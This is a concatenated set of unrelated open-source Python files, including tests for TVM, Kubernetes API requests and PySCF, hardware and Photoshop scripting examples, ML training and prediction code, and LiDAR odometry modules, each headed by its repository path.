expected = [
[
'b0 = sch.get_block(name="C", func_name="main")',
"l1, l2 = sch.get_loops(block=b0)",
"l3 = sch.fuse(l1, l2, preserve_unit_iters=True)",
"v4 = sch.sample_categorical(candidates=[32, 64, 128, 256, 512, 1024], probs=[0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666])",
"l5, l6 = sch.split(loop=l3, factors=[None, v4], preserve_unit_iters=True)",
'sch.bind(loop=l5, thread_axis="blockIdx.x")',
'sch.bind(loop=l6, thread_axis="threadIdx.x")',
]
]
target = Target("nvidia/geforce-rtx-3080", host="llvm")
ctx = _create_context(
element_wise,
target=target,
rule=auto_bind(target=target),
)
spaces = ctx.space_generator.generate_design_space(mod=ctx.mod)
assert len(spaces) == 1
check_trace(spaces, expected)
def test_cuda_reduction_loop_only():
expected = [
[
'b0 = sch.get_block(name="C", func_name="main")',
"l1, = sch.get_loops(block=b0)",
"l2 = sch.add_unit_loop(block_or_loop=l1)",
"l3 = sch.fuse(l2, preserve_unit_iters=True)",
"l4, l5 = sch.split(loop=l3, factors=[None, 1], preserve_unit_iters=True)",
'sch.bind(loop=l4, thread_axis="blockIdx.x")',
'sch.bind(loop=l5, thread_axis="threadIdx.x")',
]
]
target = Target("nvidia/geforce-rtx-3080", host="llvm")
ctx = _create_context(
reduction_loop_only,
target=target,
rule=auto_bind(target=target),
)
spaces = ctx.space_generator.generate_design_space(mod=ctx.mod)
assert len(spaces) == 1
check_trace(spaces, expected)
def test_cuda_zero_dim_add():
expected = [
[
'b0 = sch.get_block(name="C", func_name="main")',
"l1 = sch.add_unit_loop(block_or_loop=b0)",
"l2 = sch.fuse(l1, preserve_unit_iters=True)",
"l3, l4 = sch.split(loop=l2, factors=[None, 1], preserve_unit_iters=True)",
'sch.bind(loop=l3, thread_axis="blockIdx.x")',
'sch.bind(loop=l4, thread_axis="threadIdx.x")',
]
]
target = Target("nvidia/geforce-rtx-3080", host="llvm")
ctx = _create_context(
zero_dim_add,
target=target,
rule=auto_bind(target=target),
)
spaces = ctx.space_generator.generate_design_space(mod=ctx.mod)
assert len(spaces) == 1
check_trace(spaces, expected)
if __name__ == "__main__":
test_cuda_element_wise()
test_cuda_reduction_loop_only()
test_cuda_zero_dim_add()
|
tests/test_kube_api.py | funkypenguin/connaisseur | 281 | 11090541 | <gh_stars>100-1000
import pytest
from . import conftest as fix
import connaisseur.kube_api as k_api
@pytest.mark.parametrize(
"url, response",
[
(
"https://samplenotray.io/apis/v1/namespaces/default/pods/sample-pod",
fix.get_k8s_res("pods"),
),
(
"https://samplenotray.io/apis/v1/namespaces/default/deployments/sample-dpl",
fix.get_k8s_res("deployments"),
),
],
)
def test_request_kube_api(monkeypatch, m_request, url: str, response: dict):
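    # The Kubernetes service host/port are faked to mimic an in-cluster
    # environment; m_request (a conftest fixture) presumably stubs the HTTP layer
    # so the canned JSON fixtures above are returned unchanged.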
monkeypatch.setenv("KUBERNETES_SERVICE_HOST", "127.0.0.1")
monkeypatch.setenv("KUBERNETES_SERVICE_PORT", "1234")
assert k_api.request_kube_api(url) == response
|
setup.py | twocucao/danmu.fm | 376 | 11090561 | <reponame>twocucao/danmu.fm
# -*- encoding: UTF-8 -*-
from setuptools import setup, find_packages
"""
The setup() used for packaging must be imported.
"""
VERSION = '0.3.6'
setup(name='danmu.fm',
version=VERSION,
package_data={'danmufm': ['template/*', ]},
description="a tiny and smart cli player of douyu based on Python",
long_description='just enjoy',
classifiers=[], # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers
keywords='python douyu danmu danmu.fm terminal',
author='twocucao',
author_email='<EMAIL>',
url='https://github.com/twocucao/doumu.fm',
license='MIT',
packages=find_packages(),
include_package_data=True,
zip_safe=True,
install_requires=[
'requests',
'click',
],
entry_points={
'console_scripts': [
'danmu.fm = danmufm.danmu:main'
]
},
)
# install_requires=[
# 'requests',
# 'pycookiecheat'
# ] + (['pyobjc-core', 'pyobjc'] if 'darwin' in sys.platform else []),
|
pyscf/pbc/gw/test/test_kugw.py | QuESt-Calculator/pyscf | 501 | 11090574 | #!/usr/bin/env python
import unittest
import numpy
import os
from pyscf import lib
from pyscf.pbc import gto, dft, scf, df
from pyscf.pbc.gw import kugw_ac
cell = gto.Cell()
cell.build(
unit = 'B',
a = [[ 0., 6.74027466, 6.74027466],
[ 6.74027466, 0., 6.74027466],
[ 6.74027466, 6.74027466, 0. ]],
atom = '''H 0 0 0
H 1.68506866 1.68506866 1.68506866
H 3.37013733 3.37013733 3.37013733''',
basis = 'gth-dzvp',
pseudo = 'gth-pade',
verbose = 7,
output = '/dev/null',
charge = 0,
spin = None)
cell.spin = 3
kpts = cell.make_kpts([3,1,1], scaled_center=[0,0,0])
kmf = scf.KUHF(cell, kpts, exxdiv=None).density_fit()
kmf.run()
def tearDownModule():
global cell, kmf
cell.stdout.close()
del cell, kmf
class KnownValues(unittest.TestCase):
def test_gwac_pade(self):
gw = kugw_ac.KUGWAC(kmf)
gw.linearized = False
gw.ac = 'pade'
gw.fc = False
nocca, noccb = gw.nocc
gw.kernel(kptlist=[0,1,2], orbs=range(0, nocca+3))
self.assertAlmostEqual(gw.mo_energy[0][0][nocca-1], -0.28012813, 5)
self.assertAlmostEqual(gw.mo_energy[0][0][nocca], 0.13748876, 5)
self.assertAlmostEqual(gw.mo_energy[0][1][nocca-1], -0.29515851, 5)
self.assertAlmostEqual(gw.mo_energy[0][1][nocca], 0.14128011, 5)
self.assertAlmostEqual(gw.mo_energy[1][0][noccb-1], -0.33991721, 5)
self.assertAlmostEqual(gw.mo_energy[1][0][noccb], 0.10578847, 5)
self.assertAlmostEqual(gw.mo_energy[1][1][noccb-1], -0.33547973, 5)
self.assertAlmostEqual(gw.mo_energy[1][1][noccb], 0.08053408, 5)
gw.fc = True
nocca, noccb = gw.nocc
gw.kernel(kptlist=[0,1,2], orbs=range(0,nocca+3))
self.assertAlmostEqual(gw.mo_energy[0][0][nocca-1], -0.40244058, 5)
self.assertAlmostEqual(gw.mo_energy[0][0][nocca], 0.13618348, 5)
self.assertAlmostEqual(gw.mo_energy[0][1][nocca-1], -0.41743063, 5)
self.assertAlmostEqual(gw.mo_energy[0][1][nocca], 0.13997427, 5)
self.assertAlmostEqual(gw.mo_energy[1][0][noccb-1], -0.46133481, 5)
self.assertAlmostEqual(gw.mo_energy[1][0][noccb], 0.1044926 , 5)
self.assertAlmostEqual(gw.mo_energy[1][1][noccb-1], -0.4568894 , 5)
self.assertAlmostEqual(gw.mo_energy[1][1][noccb], 0.07922511, 5)
if __name__ == '__main__':
print('Full Tests for KUGW')
unittest.main()
|
social_auth/backends/contrib/angel.py | merutak/django-social-auth | 863 | 11090576 | <reponame>merutak/django-social-auth
from social.backends.angel import AngelOAuth2 as AngelBackend
|
euporie/box.py | joouha/euporie | 505 | 11090578 | # -*- coding: utf-8 -*-
"""Define box border constants."""
from typing import Optional
from prompt_toolkit.layout.containers import Container
from prompt_toolkit.layout.dimension import Dimension
from prompt_toolkit.layout.mouse_handlers import MouseHandlers
from prompt_toolkit.layout.screen import Char, Screen, WritePosition
from prompt_toolkit.widgets.base import Border as PtkBorder
from euporie.config import config
__all__ = ["SquareBorder", "RoundBorder", "BorderLine", "Pattern"]
class SquareBorder(PtkBorder):
"""Box drawing characters, including characters for splits."""
SPLIT_BOTTOM = "┴"
SPLIT_TOP = "┬"
SPLIT_LEFT = "├"
SPLIT_RIGHT = "┤"
CROSS = "┼"
class RoundBorder(SquareBorder):
"""Box drawing characters with rounded corners."""
TOP_LEFT = "╭"
TOP_RIGHT = "╮"
BOTTOM_LEFT = "╰"
BOTTOM_RIGHT = "╯"
class BorderLine(Container):
"""Draws a horizontal or vertical line."""
def __init__(
self,
char: "Optional[str]" = None,
width: "Optional[int]" = None,
height: "Optional[int]" = None,
collapse: "bool" = False,
style: "str" = "class:border-line",
) -> "None":
"""Initalizes a border line.
Args:
            char: The character to draw. If unset, the relevant character from
:py:class:`euporie.box.Border` is used
width: The length of the line. If specified, the line will be horizontal
height: The height of the line. If specified, the line will be vertical
collapse: Whether to hide the line when there is not enough space
style: Style to apply to the line
Raises:
ValueError: If both width and height are specified. A line must only have a
single dimension.
"""
if width and height:
raise ValueError("Only one of `width` or `height` must be set")
self.width = width
self.height = height
if char is None:
char = SquareBorder.VERTICAL if width else SquareBorder.HORIZONTAL
self.char = Char(char, style)
self.collapse = collapse
def reset(self) -> "None":
"""Resets the state of the line. Does nothing."""
def preferred_width(self, max_available_width: "int") -> "Dimension":
"""Return the preferred width of the line."""
return Dimension(min=int(not self.collapse), max=self.width)
def preferred_height(
self, width: "int", max_available_height: "int"
) -> "Dimension":
"""Return the preferred height of the line."""
return Dimension(min=int(not self.collapse), max=self.height)
def write_to_screen(
self,
screen: "Screen",
mouse_handlers: "MouseHandlers",
write_position: "WritePosition",
parent_style: "str",
erase_bg: "bool",
z_index: "Optional[int]",
) -> "None":
"""Draws a continous line in the ``write_position`` area.
Args:
screen: The :class:`~prompt_toolkit.layout.screen.Screen` class to which
the output has to be written.
mouse_handlers: :class:`prompt_toolkit.layout.mouse_handlers.MouseHandlers`.
write_position: A :class:`prompt_toolkit.layout.screen.WritePosition` object
defining where this container should be drawn.
erase_bg: If true, the background will be erased prior to drawing.
parent_style: Style string to pass to the :class:`.Window` object. This will
be applied to all content of the windows. :class:`.VSplit` and
:class:`prompt_toolkit.layout.containers.HSplit` can use it to pass
their style down to the windows that they contain.
z_index: Used for propagating z_index from parent to child.
"""
ypos = write_position.ypos
xpos = write_position.xpos
for y in range(ypos, ypos + write_position.height):
row = screen.data_buffer[y]
for x in range(xpos, xpos + write_position.width):
row[x] = self.char
def get_children(self) -> "list":
"""Return an empty list of the container's children."""
return []
class Pattern(Container):
"""Fill an area with a repeating background pattern."""
def __init__(self) -> "None":
"""Initalize the :class:`Pattern`."""
self.bg = Char(" ", "class:pattern")
self.char = Char(config.background_character, "class:pattern")
def reset(self) -> "None":
"""Resets the pattern. Does nothing."""
pass
def preferred_width(self, max_available_width: "int") -> "Dimension":
"""Return an empty diemension (expand to available width)."""
return Dimension()
def preferred_height(
self, width: "int", max_available_height: "int"
) -> "Dimension":
"""Return an empty diemension (expand to available height)."""
return Dimension()
def write_to_screen(
self,
screen: "Screen",
mouse_handlers: "MouseHandlers",
write_position: "WritePosition",
parent_style: "str",
erase_bg: "bool",
z_index: "Optional[int]",
) -> "None":
"""Fill the whole area of write_position with a pattern.
Args:
screen: The :class:`~prompt_toolkit.layout.screen.Screen` class to which
the output has to be written.
mouse_handlers: :class:`prompt_toolkit.layout.mouse_handlers.MouseHandlers`.
write_position: A :class:`prompt_toolkit.layout.screen.WritePosition` object
defining where this container should be drawn.
erase_bg: If true, the background will be erased prior to drawing.
parent_style: Style string to pass to the :class:`.Window` object. This will
be applied to all content of the windows. :class:`.VSplit` and
:class:`prompt_toolkit.layout.containers.HSplit` can use it to pass
their style down to the windows that they contain.
z_index: Used for propagating z_index from parent to child.
"""
ypos = write_position.ypos
xpos = write_position.xpos
for y in range(ypos, ypos + write_position.height):
row = screen.data_buffer[y]
for x in range(xpos, xpos + write_position.width):
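                # config.background_pattern selects the fill rule: 1 fills every
                # cell, 2 gives a checkerboard, 3 and 4 give diagonal stripes of
                # different spacing, and 5 gives a staggered, brick-like grid.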
if (
(config.background_pattern == 1)
or (config.background_pattern == 2 and (x + y) % 2 == 0)
or (config.background_pattern == 3 and (x + 2 * y) % 4 == 0)
or (config.background_pattern == 4 and (x + y) % 3 == 0)
or (
config.background_pattern == 5
and ((x + y % 2 * 3) % 6) % 4 == 0
)
):
row[x] = self.char
else:
row[x] = self.bg
def get_children(self) -> "list":
"""Return an empty list of the container's children."""
return []
|
Software/Python/grove_mini_motor_driver/driver_example.py | benmcclelland/GrovePi | 482 | 11090587 | <gh_stars>100-1000
#!/usr/bin/env python3
#
# The GrovePi connects the Raspberry Pi and Grove sensors. You can learn more about GrovePi here: http://www.dexterindustries.com/GrovePi
#
# Have a question about this example? Ask on the forums here: http://forum.dexterindustries.com/c/grovepi
#
'''
## License
The MIT License (MIT)
GrovePi for the Raspberry Pi: an open source platform for connecting Grove Sensors to the Raspberry Pi.
Copyright (C) 2017 Dexter Industries
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
'''
from grove_mini_motor_driver import MiniMotorDriver
from grove_mini_motor_driver import left_channel, right_channel
from time import sleep
import sys
# if you use the built-in fault feedback (aka setDisplayFaults),
# then whenever there's a shortage of current or a motor stalls,
# a warning appears on the screen
#
# Please take a look in the terminal_log_example.txt to get a feeling
# of what this program outputs
#
# Here is some fault feedback:
#
# [04-Apr-2017 19:06:08.188770][left motor warning][undervoltage lockout]
# [04-Apr-2017 19:06:08.190704][right motor warning][undervoltage lockout]
# [04-Apr-2017 19:21:17.990704][right motor warning][overcurrent event]
# [04-Apr-2017 19:23:11.768320][right motor warning][extended current limit event]
# [04-Apr-2017 19:25:08.330140][right motor warning][overtemperature condition]
# [04-Apr-2017 19:38:54.781218][right motor warning][unknown condition]
# Don't forget to run it with Python 3 !!
# Don't forget to run it with Python 3 !!
# Don't forget to run it with Python 3 !!
def Main():
# initialize an object of the motor driver class
    # with the appropriate channel address
    # we can also add a 3rd argument which is an SMBus object
# in case we don't want to let the class instantiate it
driver = MiniMotorDriver(left_channel, right_channel)
# enable display feedback/output of motors status
# alternatively we can use driver.setDisplayFaults(False) to disable it
driver.setDisplayFaults()
# increase the power to the motors from 0% -> 100% in 5 seconds
# motors rotate in tandem
for percent in range(101):
driver.moveForward(percent)
sleep(0.05)
# stay at 100% power for 2 seconds
sleep(2)
# and then move backwards at 50% thrust for another 2 seconds
driver.moveBackwards(50)
sleep(2)
# stop the motors immediately -> driver opposes an electromotive force
    # in order to stop the motors faster rather than cutting the power
driver.stopMotors()
# stay off for 1 second
sleep(1)
# and then set the right motor to FORWARD direction at 70% thrust
driver.setRightMotor('FORWARD', 70)
# and keep this going for 5 seconds
sleep(5)
# while it's spinning, completely reverse the thrust
# for another 5 seconds
driver.setRightMotor('REVERSE', 70)
sleep(5)
    # then set the motors to rotate in opposing directions
    # such a command would make a GoPiGo rotate on the spot
# do this for one second
driver.setRightMotor('FORWARD', 50)
driver.setLeftMotor('REVERSE', 50)
sleep(1)
# and disable motors
    # it's different from the stopMotors() function
# because it just cuts power definitely and
# puts the motor driver in a low-power state
driver.disableMotors()
if __name__ == "__main__":
try:
# it's the above function we call
Main()
# in case CTRL-C / CTRL-D keys are pressed (or anything else that might interrupt)
except KeyboardInterrupt:
print('[Keyboard interrupted]')
sys.exit(0)
# in case there's an IO error aka I2C
except IOError:
print('[IO Error]')
sys.exit(0)
|
predict.py | ahmedbesbes/character-based-cnn | 233 | 11090605 | <reponame>ahmedbesbes/character-based-cnn
import argparse
import torch
import torch.nn.functional as F
from src.model import CharacterLevelCNN
from src import utils
use_cuda = torch.cuda.is_available()
def predict(args):
model = CharacterLevelCNN(args, args.number_of_classes)
state = torch.load(args.model)
model.load_state_dict(state)
model.eval()
processed_input = utils.preprocess_input(args)
processed_input = torch.tensor(processed_input)
processed_input = processed_input.unsqueeze(0)
if use_cuda:
processed_input = processed_input.to("cuda")
model = model.to("cuda")
prediction = model(processed_input)
probabilities = F.softmax(prediction, dim=1)
probabilities = probabilities.detach().cpu().numpy()
return probabilities
if __name__ == "__main__":
parser = argparse.ArgumentParser(
"Testing a pretrained Character Based CNN for text classification"
)
parser.add_argument("--model", type=str, help="path for pre-trained model")
parser.add_argument("--text", type=str, default="I love pizza!", help="text string")
parser.add_argument("--steps", nargs="+", default=["lower"])
    # arguments needed for the prediction
parser.add_argument(
"--alphabet",
type=str,
default="abcdefghijklmnopqrstuvwxyz0123456789-,;.!?:'\"/\\|_@#$%^&*~`+ =<>()[]{}",
)
parser.add_argument("--number_of_characters", type=int, default=69)
parser.add_argument("--extra_characters", type=str, default="éàèùâêîôûçëïü")
parser.add_argument("--max_length", type=int, default=300)
parser.add_argument("--number_of_classes", type=int, default=2)
args = parser.parse_args()
prediction = predict(args)
print("input : {}".format(args.text))
print("prediction : {}".format(prediction))
|
benchmarks/operator_benchmark/common/tests/jit_forward_test.py | Hacky-DH/pytorch | 60,067 | 11090610 | <gh_stars>1000+
import operator_benchmark as op_bench
import torch
intraop_bench_configs = op_bench.config_list(
attrs=[
[8, 16],
],
attr_names=["M", "N"],
tags=["short"],
)
@torch.jit.script
def torch_sumall(a, iterations):
# type: (Tensor, int)
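    # Each iteration adds the full tensor sum to the accumulator and nudges one
    # element, so successive sums differ and the loop cannot be folded away.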
result = 0.0
for _ in range(iterations):
result += float(torch.sum(a))
a[0][0] += 0.01
return result
class TorchSumBenchmark(op_bench.TorchBenchmarkBase):
def init(self, M, N):
self.input_one = torch.rand(M, N)
self.set_module_name("sum")
# This is a very temporary method and will be removed soon, so
# don't use this method in your benchmark
# TODO(mingzhe): use one forward method for both JIT and Eager
def jit_forward(self, iters):
return torch_sumall(self.input_one, iters)
op_bench.generate_pt_test(intraop_bench_configs, TorchSumBenchmark)
if __name__ == "__main__":
op_bench.benchmark_runner.main()
|
tests/test_util_input.py | NoahH99/Warcoat | 163 | 11090690 | <filename>tests/test_util_input.py
import unittest
from datetime import datetime, timedelta
from rowboat.util.input import parse_duration
class TestRuleMatcher(unittest.TestCase):
def test_basic_durations(self):
dt = parse_duration('1w2d3h4m5s')
self.assertTrue(dt < (datetime.utcnow() + timedelta(days=10)))
self.assertTrue(dt > (datetime.utcnow() + timedelta(days=7)))
def test_source_durations(self):
origin = datetime.utcnow() + timedelta(days=17)
dt = parse_duration('1w2d3h4m5s', source=origin)
compare = (origin - datetime.utcnow()) + datetime.utcnow()
self.assertTrue(dt < (compare + timedelta(days=10)))
self.assertTrue(dt > (compare + timedelta(days=7)))
def test_invalid_duration(self):
self.assertEquals(parse_duration('mmmmm', safe=True), None)
|
examples/emboss_action.py | MrTeferi/photoshop-python-api | 270 | 11090724 | # Import local modules
from photoshop import Session
with Session() as ps:
app = ps.app
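    # charIDToTypeID()/stringIDToTypeID() convert Photoshop's four-character or
    # string event identifiers into the numeric type IDs expected by the Action
    # Manager calls below (ActionDescriptor, ActionReference, executeAction).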
for index, x in enumerate(range(50)):
# Execute an existing action from action palette.
idPly = app.charIDToTypeID("Ply ")
desc8 = ps.ActionDescriptor()
idnull = app.charIDToTypeID("null")
ref3 = ps.ActionReference()
idActn = app.charIDToTypeID("Actn")
ref3.putName(idActn, "Sepia Toning (layer)")
idASet = app.charIDToTypeID("ASet")
ref3.PutName(idASet, "Default Actions")
desc8.putReference(idnull, ref3)
app.executeAction(idPly, desc8, ps.DialogModes.DisplayNoDialogs)
# Create solid color fill layer.
idMk = app.charIDToTypeID("Mk ")
desc21 = ps.ActionDescriptor()
idNull = app.charIDToTypeID("null")
ref12 = ps.ActionReference()
idContentLayer1 = app.stringIDToTypeID("contentLayer")
ref12.putClass(idContentLayer1)
desc21.putReference(idNull, ref12)
idUsng = app.charIDToTypeID("Usng")
desc22 = ps.ActionDescriptor()
idType = app.charIDToTypeID("Type")
desc23 = ps.ActionDescriptor()
idClr = app.charIDToTypeID("Clr ")
desc24 = ps.ActionDescriptor()
idRd = app.charIDToTypeID("Rd ")
desc24.putDouble(idRd, index)
idGrn = app.charIDToTypeID("Grn ")
desc24.putDouble(idGrn, index)
idBl = app.charIDToTypeID("Bl ")
desc24.putDouble(idBl, index)
idRGBC = app.charIDToTypeID("RGBC")
desc23.putObject(idClr, idRGBC, desc24)
idSolidColorLayer = app.StringIDToTypeID("solidColorLayer")
desc22.putObject(idType, idSolidColorLayer, desc23)
idContentLayer2 = app.StringIDToTypeID("contentLayer")
desc21.putObject(idUsng, idContentLayer2, desc22)
app.executeAction(idMk, desc21, ps.DialogModes.DisplayNoDialogs)
# Select mask.
idSlct = app.charIDToTypeID("slct")
desc38 = ps.ActionDescriptor()
idNull1 = app.charIDToTypeID("null")
ref20 = ps.ActionReference()
idChnl1 = app.charIDToTypeID("Chnl")
idChnl2 = app.charIDToTypeID("Chnl")
idMsk = app.charIDToTypeID("Msk ")
ref20.putEnumerated(idChnl1, idChnl2, idMsk)
desc38.putReference(idNull1, ref20)
idMkVs = app.charIDToTypeID("MkVs")
desc38.putBoolean(idMkVs, False)
app.executeAction(idSlct, desc38, ps.DialogModes.DisplayNoDialogs)
app.activeDocument.activeLayer.invert()
|
src/causallift/nodes/estimate_propensity.py | Minyus/causallift | 265 | 11090787 | <reponame>Minyus/causallift<gh_stars>100-1000
import logging
import pandas as pd
from .utils import * # NOQA
log = logging.getLogger(__name__)
try:
import matplotlib.pyplot as plt
except: # NOQA
print("[Warning] Could not import matplotlib.pyplot. ")
def fit_propensity(args, df):
X_train = df.xs("train")[args.cols_features]
y_train = df.xs("train")[args.col_treatment]
# X_test = df.xs("test")[args.cols_features]
# y_test = df.xs("test")[args.col_treatment]
# """ Transfrom by StandardScaler """
# from sklearn import preprocessing
# scaler = preprocessing.StandardScaler().fit(X_train)
# X_train = scaler.transform(X_train)
# X_test = scaler.transform(X_test)
# """ Transform by PCA """
# from sklearn.decomposition import PCA
# pca = PCA(0.99)
# pca.fit(X_train)
# X_train = pca.transform(X_train)
# X_test = pca.transform(X_test)
model = initialize_model(args, model_key="propensity_model_params")
if args.verbose >= 2:
log.info("## Propensity scores will be estimated by logistic regression.")
if args.verbose >= 3:
log.info(
"### Parameters for grid search of Logistic regression:\n{}".format(
args.propensity_model_params
)
)
model.fit(X_train, y_train)
best_estimator = (
model.best_estimator_ if hasattr(model, "best_estimator_") else model
)
estimator_params = best_estimator.get_params()
if "steps" in estimator_params:
best_estimator = estimator_params["steps"][-1][1]
estimator_params = best_estimator.get_params()
if args.verbose >= 3:
log.info(
"### Best parameter for logistic regression:\n{}".format(estimator_params)
)
if args.verbose >= 2:
log.info("\n## Coefficients of logistic regression:")
coef_df = pd.DataFrame(
best_estimator.coef_.reshape(1, -1),
columns=args.cols_features,
index=["coefficient"],
)
apply_method(coef_df, args.df_print)
return model
def estimate_propensity(args, df, model):
X_train = df.xs("train")[args.cols_features]
y_train = df.xs("train")[args.col_treatment]
X_test = df.xs("test")[args.cols_features]
y_test = df.xs("test")[args.col_treatment]
proba_train = model.predict_proba(X_train)[:, 1]
proba_test = model.predict_proba(X_test)[:, 1]
if args.verbose >= 3:
log.info("\n### Histogram of propensity score for train and test data:")
pd.Series(proba_train).hist()
pd.Series(proba_test).hist()
try:
plt.show()
except: # NOQA
log.info("[Warning] Could not show the histogram.")
# Optional evaluation and report of logistic regression
if args.verbose >= 3:
y_pred_train = model.predict(X_train)
y_pred_test = model.predict(X_test)
log.info(
"\n### Score Table for logistic regression to calculate propensity score:"
)
apply_method(
score_df(y_train, y_test, y_pred_train, y_pred_test), args.df_print
)
# if args.verbose >= 3:
log.info("\n### Confusion Matrix for Train:")
apply_method(conf_mat_df(y_train, y_pred_train), args.df_print)
# if args.verbose >= 3:
log.info("\n### Confusion Matrix for Test:")
apply_method(conf_mat_df(y_test, y_pred_test), args.df_print)
train_df = df.xs("train")
test_df = df.xs("test")
train_df.loc[:, args.col_propensity] = proba_train
test_df.loc[:, args.col_propensity] = proba_test
df = concat_train_test_df(args, train_df, test_df)
return df
def schedule_propensity_scoring(args, df):
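    # Propensity scores only need to be estimated when IPW is enabled and the
    # data frame does not already provide a propensity column.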
args.need_propensity_scoring = args.enable_ipw and (
args.col_propensity not in df.columns
)
if not args.need_propensity_scoring:
if args.enable_ipw:
if args.verbose >= 2:
log.info(
"Skip estimation of propensity score because "
"{} column found in the data frame. ".format(args.col_propensity)
)
else:
if args.verbose >= 2:
log.info(
"Skip estimation of propensity score because "
'"enable_ipw" is set to False.'
)
return args
|
plato/algorithms/mistnet.py | cuiboyuan/plato | 135 | 11090807 | """
The PyTorch-based MistNet algorithm, used by both the client and the server.
Reference:
<NAME>, et al. "MistNet: Towards Private Neural Network Training with Local
Differential Privacy," found in docs/papers.
"""
import logging
import time
import torch
from plato.algorithms import fedavg
from plato.datasources import feature_dataset
from plato.config import Config
class Algorithm(fedavg.Algorithm):
"""The PyTorch-based MistNet algorithm, used by both the client and the
server.
"""
def extract_features(self, dataset, sampler, cut_layer: str):
"""Extracting features using layers before the cut_layer.
dataset: The training or testing dataset.
cut_layer: Layers before this one will be used for extracting features.
"""
self.model.eval()
_train_loader = getattr(self.trainer, "train_loader", None)
if callable(_train_loader):
data_loader = self.trainer.train_loader(batch_size=1,
trainset=dataset,
sampler=sampler.get(),
extract_features=True)
else:
data_loader = torch.utils.data.DataLoader(
dataset,
batch_size=Config().trainer.batch_size,
sampler=sampler.get())
tic = time.perf_counter()
feature_dataset = []
for inputs, targets, *__ in data_loader:
with torch.no_grad():
logits = self.model.forward_to(inputs, cut_layer)
feature_dataset.append((logits, targets))
toc = time.perf_counter()
logging.info("[Client #%s] Time used: %.2f seconds.", self.client_id,
toc - tic)
return feature_dataset
def train(self, trainset, sampler, cut_layer=None):
""" Train the neural network model after the cut layer. """
self.trainer.train(
feature_dataset.FeatureDataset(trainset.feature_dataset), sampler,
cut_layer)
|
slam/odometry/posenet_odometry.py | Pandinosaurus/pyLiDAR-SLAM | 130 | 11090836 | <reponame>Pandinosaurus/pyLiDAR-SLAM
from pathlib import Path
from typing import Dict, Union, Any
import numpy as np
# Hydra and OmegaConf
from hydra.core.config_store import ConfigStore
from omegaconf import MISSING, DictConfig
from hydra.conf import dataclass
# Project Imports
from slam.common.pose import Pose
from slam.common.timer import *
from slam.odometry import *
from slam.odometry.odometry import OdometryAlgorithm, OdometryConfig
from slam.training.prediction_modules import _PoseNetPredictionModule
# ----------------------------------------------------------------------------------------------------------------------
@dataclass
class PoseNetOdometryConfig(OdometryConfig):
"""
    The Configuration for the PoseNet-based deep regression of the relative pose
"""
debug: bool = False
viz_mode: str = "aggregated"
algorithm: str = "posenet"
train_dir: str = MISSING # The directory where the posenet_config and checkpoint file should be searched in
train_config_file: str = "config.yaml" # Default value set by ATrainer
checkpoint_file: str = "checkpoint.ckp" # Default value set by ATrainer
device: str = MISSING
pose: str = MISSING
posenet_config: Dict[str, Any] = MISSING
# Hydra -- Add a PoseNetOdometryConfig
cs = ConfigStore.instance()
cs.store(name="poseresnet18", node=PoseNetOdometryConfig(posenet_config={"type": "poseresnet",
"model": 18}),
package="odometry.posenet_config")
# ----------------------------------------------------------------------------------------------------------------------
class PoseNetOdometry(OdometryAlgorithm):
"""Deep Odometry"""
def __init__(self, config: Union[PoseNetOdometryConfig, DictConfig],
pose: Pose = Pose("euler"),
device: torch.device = torch.device("cpu"),
**kwargs):
OdometryAlgorithm.__init__(self, config)
# Set variables needed by the module
self.device = device
self.pose = pose
# Loads the train config from the disk
train_dir = Path(config.train_dir)
assert_debug(train_dir.exists())
train_config_path = train_dir / config.train_config_file
checkpoint_path = train_dir / config.checkpoint_file
assert_debug(train_config_path.exists() and checkpoint_path.exists())
self.checkpoint_path = str(checkpoint_path)
# Reads the prediction config from the dict
with open(str(train_config_path), "r") as stream:
train_config = OmegaConf.load(stream)
prediction_config: DictConfig = train_config["training"]["prediction"]
# Construct the Prediction module from the config read from disk
self.prediction_module = _PoseNetPredictionModule(prediction_config,
pose=self.pose)
self.prediction_module = self.prediction_module.to(self.device)
# ----------------------
# Local variable
self.previous_vertex_map = None
self._iter = 0
self.relative_poses = []
def init(self):
"""
        Initializes the Odometry algorithm:
        clears the persisted relative poses, resets `_iter` to 0,
        and loads the module parameters from disk
"""
super().init()
self.relative_poses = []
self._iter = 0
# Load the parameters of the model from the config
state_dict = torch.load(self.checkpoint_path)
self.prediction_module.load_state_dict(state_dict["prediction_module"])
def do_process_next_frame(self, data_dict: dict):
"""
Registers the new frame
"""
vertex_map = data_dict["vertex_map"]
if self._iter == 0:
self.previous_vertex_map = vertex_map.unsqueeze(0)
self._iter += 1
self.relative_poses.append(np.eye(4, dtype=np.float32).reshape(1, 4, 4))
return
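        # The network consumes the previous and current vertex maps stacked along
        # the channel dimension and regresses relative pose parameters, which are
        # then converted into a 4x4 transformation matrix.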
pair_vmap = torch.cat([self.previous_vertex_map, vertex_map.unsqueeze(0)], dim=1)
with torch.no_grad():
output_dict = self.prediction_module(dict(vertex_map=pair_vmap))
pose_params = output_dict["pose_params"]
new_rpose = self.pose.build_pose_matrix(pose_params)
# Update the state of the odometry
self.previous_vertex_map = vertex_map.unsqueeze(0)
self.relative_poses.append(new_rpose.cpu().numpy())
self._iter += 1
def get_relative_poses(self) -> np.ndarray:
return np.concatenate(self.relative_poses, axis=0)
|
intro/matplotlib/examples/pretty_plots/plot_grid_ext.py | zmoon/scipy-lecture-notes | 2,538 | 11090880 | <gh_stars>1000+
"""
Grid elaborate
===============
An example displaying a grid on the axes and tweaking the layout.
"""
import matplotlib.pyplot as plt
from matplotlib.ticker import MultipleLocator
